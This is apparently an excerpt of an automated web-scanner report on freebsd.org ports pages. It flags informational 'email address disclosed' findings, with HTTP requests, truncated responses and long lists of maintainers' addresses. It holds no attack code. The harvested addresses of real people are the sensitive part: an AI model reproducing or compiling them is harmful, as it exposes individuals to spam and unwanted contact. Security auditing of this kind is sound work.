<A HREF="mailto:mij@bitchx.it">mij@bitchx.it</A>
...[SNIP]...
<A HREF="mailto:ache@freebsd.org">ache@freebsd.org</A>
...[SNIP]...
<A HREF="mailto:bc979@lafn.org">bc979@lafn.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jack@jarasoft.net">jack@jarasoft.net</A>
...[SNIP]...
<A HREF="mailto:ozkan@enderunix.org">ozkan@enderunix.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:yaizawa@2004.jukuin.keio.ac.jp">yaizawa@2004.jukuin.keio.ac.jp</A>
...[SNIP]...
<A HREF="mailto:itetcu@FreeBSD.org">itetcu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:itetcu@FreeBSD.org">itetcu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:moro@remus.dti.ne.jp">moro@remus.dti.ne.jp</A>
...[SNIP]...
<A HREF="mailto:drixter@e-utp.net">drixter@e-utp.net</A>
...[SNIP]...
<A HREF="mailto:edwin@mavetju.org">edwin@mavetju.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mike@tric.tomsk.gov.ru">mike@tric.tomsk.gov.ru</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:oz@nixil.net">oz@nixil.net</A>
...[SNIP]...
<A HREF="mailto:kline@thought.org">kline@thought.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vsevolod@FreeBSD.org">vsevolod@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:alexey@renatasystems.org">alexey@renatasystems.org</A>
...[SNIP]...
<A HREF="mailto:alexey@renatasystems.org">alexey@renatasystems.org</A>
...[SNIP]...
<A HREF="mailto:alexey@renatasystems.org">alexey@renatasystems.org</A>
...[SNIP]...
<A HREF="mailto:alexey@renatasystems.org">alexey@renatasystems.org</A>
...[SNIP]...
<A HREF="mailto:alexey@renatasystems.org">alexey@renatasystems.org</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gromnizki@unixdev.net">gromnizki@unixdev.net</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsdports@chillibear.com">freebsdports@chillibear.com</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsdports@chillibear.com">freebsdports@chillibear.com</A>
...[SNIP]...
<A HREF="mailto:freebsdports@chillibear.com">freebsdports@chillibear.com</A>
...[SNIP]...
<A HREF="mailto:knu@FreeBSD.org">knu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:alexey@renatasystems.org">alexey@renatasystems.org</A>
...[SNIP]...
<A HREF="mailto:m.seaman@infracaninophile.co.uk">m.seaman@infracaninophile.co.uk</A>
...[SNIP]...
<A HREF="mailto:roam@FreeBSD.org">roam@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:oleg@mamontov.net">oleg@mamontov.net</A>
...[SNIP]...
<A HREF="mailto:snabb@epipe.com">snabb@epipe.com</A>
...[SNIP]...
<A HREF="mailto:citycat4@ngs.ru">citycat4@ngs.ru</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:zakj@nox.cx">zakj@nox.cx</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lukasz@wasikowski.net">lukasz@wasikowski.net</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lippe@FreeBSD.org">lippe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mi@aldan.algebra.com">mi@aldan.algebra.com</A>
...[SNIP]...
<A HREF="mailto:alexey@renatasystems.org">alexey@renatasystems.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bart@tapolsky.net.ua">bart@tapolsky.net.ua</A>
...[SNIP]...
<A HREF="mailto:fw@moov.de">fw@moov.de</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mnag@FreeBSD.org">mnag@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mich@FreeBSD.org">mich@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hubert@frbsd.org">hubert@frbsd.org</A>
...[SNIP]...
<A HREF="mailto:glarkin@FreeBSD.org">glarkin@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:eksffa@freebsdbrasil.com.br">eksffa@freebsdbrasil.com.br</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lasse@freebsdcluster.org">lasse@freebsdcluster.org</A>
...[SNIP]...
<A HREF="mailto:michael@ranner.eu">michael@ranner.eu</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:michael@ranner.eu">michael@ranner.eu</A>
...[SNIP]...
<A HREF="mailto:michael@ranner.eu">michael@ranner.eu</A>
...[SNIP]...
<A HREF="mailto:thierry@FreeBSD.org">thierry@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ohauer@FreeBSD.org">ohauer@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:xride@FreeBSD.org">xride@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stefan@FreeBSD.org">stefan@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:leeym@FreeBSD.org">leeym@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ehaupt@FreeBSD.org">ehaupt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fw@moov.de">fw@moov.de</A>
...[SNIP]...
<A HREF="mailto:ast@treibsand.com">ast@treibsand.com</A>
...[SNIP]...
<A HREF="mailto:ast@treibsand.com">ast@treibsand.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:tabthorpe@freebsd.org">tabthorpe@freebsd.org</A>
...[SNIP]...
<A HREF="mailto:lambert@lambertfam.org">lambert@lambertfam.org</A>
...[SNIP]...
<A HREF="mailto:tabthorpe@FreeBSD.org">tabthorpe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:neil@darlow.co.uk">neil@darlow.co.uk</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:itetcu@FreeBSD.org">itetcu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tabthorpe@FreeBSD.org">tabthorpe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:itetcu@FreeBSD.org">itetcu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tabthorpe@FreeBSD.org">tabthorpe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stb@lassitu.de">stb@lassitu.de</A>
...[SNIP]...
<A HREF="mailto:tabthorpe@FreeBSD.org">tabthorpe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:itetcu@FreeBSD.org">itetcu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:neil@darlow.co.uk">neil@darlow.co.uk</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports.maintainer@evilphi.com">ports.maintainer@evilphi.com</A>
...[SNIP]...
<A HREF="mailto:tabthorpe@FreeBSD.org">tabthorpe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tabthorpe@FreeBSD.org">tabthorpe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:itetcu@FreeBSD.org">itetcu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:morinaga@riken.jp">morinaga@riken.jp</A>
...[SNIP]...
<A HREF="mailto:tabthorpe@FreeBSD.org">tabthorpe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:email-ports@def-defying.com">email-ports@def-defying.com</A>
...[SNIP]...

24.315. http://www.freebsd.org/ports/news.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /ports/news.html

Issue detail

The following email addresses were disclosed in the response:
  • ache@FreeBSD.org
  • avatar@mmlab.cse.yzu.edu.tw
  • clsung@FreeBSD.org
  • daniel@netwalk.org
  • dinoex@FreeBSD.org
  • dk@farm.org
  • dougb@FreeBSD.org
  • dsh@vlink.ru
  • edwin@mavetju.org
  • ehaupt@FreeBSD.org
  • fehlner@gmx.de
  • fjoe@FreeBSD.org
  • fluffy@FreeBSD.org
  • gnome@FreeBSD.org
  • gslin@gslin.org
  • johans@FreeBSD.org
  • john@zoner.org
  • kde@FreeBSD.org
  • koma2@lovepeers.org
  • lasse@freebsdcluster.org
  • leeym@FreeBSD.org
  • lioux@FreeBSD.org
  • mail@ozzmosis.com
  • mandree@FreeBSD.org
  • mich@FreeBSD.org
  • miki@ceti.pl
  • miwi@FreeBSD.org
  • neal@nelson.name
  • netchild@FreeBSD.org
  • nivit@FreeBSD.org
  • obrien@FreeBSD.org
  • os@rsu.ru
  • pav@FreeBSD.org
  • perl@FreeBSD.org
  • pjenvey@groovie.org
  • ports@FreeBSD.org
  • ports@thepentagon.org
  • skv@FreeBSD.org
  • tdb@FreeBSD.org
  • thierry@FreeBSD.org
  • toxic@doobie.com
  • vd@FreeBSD.org
  • vk@vk.pp.ru

Request

GET /ports/news.html HTTP/1.1
Host: www.freebsd.org
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "1467617764"
Last-Modified: Sun, 23 Jan 2011 02:29:32 GMT
Content-Length: 176619
Date: Mon, 24 Jan 2011 14:54:35 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<TITLE>FreeBSD Ports: News</TITLE>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/ht
...[SNIP]...

24.316. http://www.freebsd.org/ports/news.html/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /ports/news.html/x22

Issue detail

The following email addresses were disclosed in the response:
  • ache@FreeBSD.org
  • avatar@mmlab.cse.yzu.edu.tw
  • clsung@FreeBSD.org
  • daniel@netwalk.org
  • dinoex@FreeBSD.org
  • dk@farm.org
  • dougb@FreeBSD.org
  • dsh@vlink.ru
  • edwin@mavetju.org
  • ehaupt@FreeBSD.org
  • fehlner@gmx.de
  • fjoe@FreeBSD.org
  • fluffy@FreeBSD.org
  • gnome@FreeBSD.org
  • gslin@gslin.org
  • johans@FreeBSD.org
  • john@zoner.org
  • kde@FreeBSD.org
  • koma2@lovepeers.org
  • lasse@freebsdcluster.org
  • leeym@FreeBSD.org
  • lioux@FreeBSD.org
  • mail@ozzmosis.com
  • mandree@FreeBSD.org
  • mich@FreeBSD.org
  • miki@ceti.pl
  • miwi@FreeBSD.org
  • neal@nelson.name
  • netchild@FreeBSD.org
  • nivit@FreeBSD.org
  • obrien@FreeBSD.org
  • os@rsu.ru
  • pav@FreeBSD.org
  • perl@FreeBSD.org
  • pjenvey@groovie.org
  • ports@FreeBSD.org
  • ports@thepentagon.org
  • skv@FreeBSD.org
  • tdb@FreeBSD.org
  • thierry@FreeBSD.org
  • toxic@doobie.com
  • vd@FreeBSD.org
  • vk@vk.pp.ru

Request

GET /ports/news.html/x22 HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "1467617764"
Last-Modified: Sun, 23 Jan 2011 02:29:32 GMT
Content-Length: 176619
Connection: close
Date: Mon, 24 Jan 2011 16:16:27 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<TITLE>FreeBSD Ports: News</TITLE>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/ht
...[SNIP]...

24.317. http://www.freebsd.org/ports/shells.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /ports/shells.html

Issue detail

The following email addresses were disclosed in the response:
  • adamw@FreeBSD.org
  • alepulver@FreeBSD.org
  • araujo@FreeBSD.org
  • danielt@pilgerer.org
  • des@FreeBSD.org
  • dinoex@FreeBSD.org
  • fjoe@FreeBSD.org
  • freebsd-security@rikrose.net
  • garga@FreeBSD.org
  • joe@zircon.seattle.wa.us
  • knu@FreeBSD.org
  • ljrittle@acm.org
  • miwi@FreeBSD.org
  • obrien@FreeBSD.org
  • pav@FreeBSD.org
  • perl@FreeBSD.org
  • ports@FreeBSD.org
  • ports@eitanadler.com
  • quanstro@quanstro.net
  • rfarmer@predatorlabs.net
  • skreuzer@FreeBSD.org
  • smatsui@karashi.org
  • sylvio@FreeBSD.org
  • ume@FreeBSD.org
  • utisoft@gmail.com
  • vaida.bogdan@gmail.com
  • vvelox@vvelox.net

Request

GET /ports/shells.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "1117702681"
Last-Modified: Sun, 23 Jan 2011 02:29:33 GMT
Content-Length: 50230
Connection: close
Date: Mon, 24 Jan 2011 16:17:20 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<TITLE>FreeBSD Ports: Shells</TITLE>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/
...[SNIP]...

24.318. http://www.freebsd.org/ports/tcl.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /ports/tcl.html

Issue detail

The following email addresses were disclosed in the response:
  • ant@monitor.deis.unical.it
  • bkoenig@alpha-tierchen.de
  • cowbert@gmail.com
  • dan@rucci.org
  • dinoex@FreeBSD.org
  • dsh@vlink.ru
  • edwin@mavetju.org
  • ehaupt@FreeBSD.org
  • erik@bz.bzflag.bz
  • erkkila@cc.jyu.fi
  • frank@fenor.de
  • girgen@FreeBSD.org
  • hokan@me.umn.edu
  • itetcu@FreeBSD.org
  • janos.mohacsi@bsd.hu
  • jhay@FreeBSD.org
  • kaduk-fbsd@mit.edu
  • kevlo@FreeBSD.org
  • mi@aldan.algebra.com
  • mm@FreeBSD.org
  • nishida@sfc.wide.ad.jp
  • nox@FreeBSD.org
  • ports@FreeBSD.Org
  • ports@FreeBSD.org
  • simon@olofsson.de
  • skv@FreeBSD.org
  • stas@FreeBSD.org
  • sylvio@FreeBSD.org

Request

GET /ports/tcl.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "880715865"
Last-Modified: Sun, 23 Jan 2011 02:29:33 GMT
Content-Length: 99244
Connection: close
Date: Mon, 24 Jan 2011 16:16:39 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<TITLE>FreeBSD Ports: Tcl</TITLE>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/htm
...[SNIP]...

24.319. http://www.freebsd.org/ports/x11-fonts.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /ports/x11-fonts.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ports/x11-fonts.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "1568217321"
Last-Modified: Sun, 23 Jan 2011 02:29:34 GMT
Content-Length: 262915
Connection: close
Date: Mon, 24 Jan 2011 16:16:47 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<TITLE>FreeBSD Ports: X11-fonts</TITLE>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="te
...[SNIP]...

24.320. http://www.freebsd.org/ports/x11-toolkits.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /ports/x11-toolkits.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ports/x11-toolkits.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "2766566488"
Last-Modified: Sun, 23 Jan 2011 02:29:34 GMT
Content-Length: 1420357
Connection: close
Date: Mon, 24 Jan 2011 16:16:31 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<TITLE>FreeBSD Ports: X11-toolkits</TITLE>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT=
...[SNIP]...
<A HREF="mailto:emulation@FreeBSD.org">emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:emulation@FreeBSD.org">emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:devel@stasyan.com">devel@stasyan.com</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bsam@FreeBSD.org">bsam@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:danfe@FreeBSD.org">danfe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:cm@therek.net">cm@therek.net</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@c0decafe.net">ports@c0decafe.net</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:swills@FreeBSD.org">swills@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vvelox@vvelox.net">vvelox@vvelox.net</A>
...[SNIP]...
<A HREF="mailto:pauls@utdallas.edu">pauls@utdallas.edu</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@c0decafe.net">ports@c0decafe.net</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:pauls@utdallas.edu">pauls@utdallas.edu</A>
...[SNIP]...
<A HREF="mailto:pauls@utdallas.edu">pauls@utdallas.edu</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vvelox@vvelox.net">vvelox@vvelox.net</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:swills@FreeBSD.org">swills@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dmitry@karasik.eu.org">dmitry@karasik.eu.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dhn@FreeBSD.org">dhn@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:cm@therek.net">cm@therek.net</A>
...[SNIP]...
<A HREF="mailto:cm@therek.net">cm@therek.net</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@freebsd.org">ports@freebsd.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fmysh@iijmio-mail.jp">fmysh@iijmio-mail.jp</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
